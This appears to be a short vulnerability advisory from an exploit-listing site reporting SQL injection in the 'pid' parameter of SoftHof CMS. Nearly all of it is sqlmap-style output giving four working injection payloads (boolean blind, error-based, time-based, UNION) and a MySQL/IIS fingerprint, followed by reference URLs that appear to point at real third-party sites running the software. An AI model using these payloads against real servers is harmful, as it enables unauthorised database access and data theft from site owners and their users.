SoftHof CMS SQLi Vulnerability

2018.03.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

"pid" parameter in SoftHof CMS is vulnerable to sqli. --- Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=259' AND 4348=4348 AND 'TEVl'='TEVl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pid=259' AND (SELECT 5234 FROM(SELECT COUNT(*),CONCAT(0x71766b7071,(SELECT (ELT(5234=5234,1))),0x7178717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UdHF'='UdHF Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=259' AND SLEEP(5) AND 'CitL'='CitL Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: pid=-5673' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6e4a4f79505369534f57736359754763617559544762526a4e61594b506d4f777855634c625a7a4d,0x7178717a71)-- pZYD --- the back-end DBMS is MySQL web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET, Microsoft IIS 8.5 back-end DBMS: MySQL >= 5.0 --------------------------------------------------------------------------------------------------------------------------------------------- Contact: https://twitter.com/aliabdollahi2

References:

http://www.mezbaan.pk/rentahouse.php?action=add&pid=332
http://www.tdcp.gop.pk/new/page.php?pid=259


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top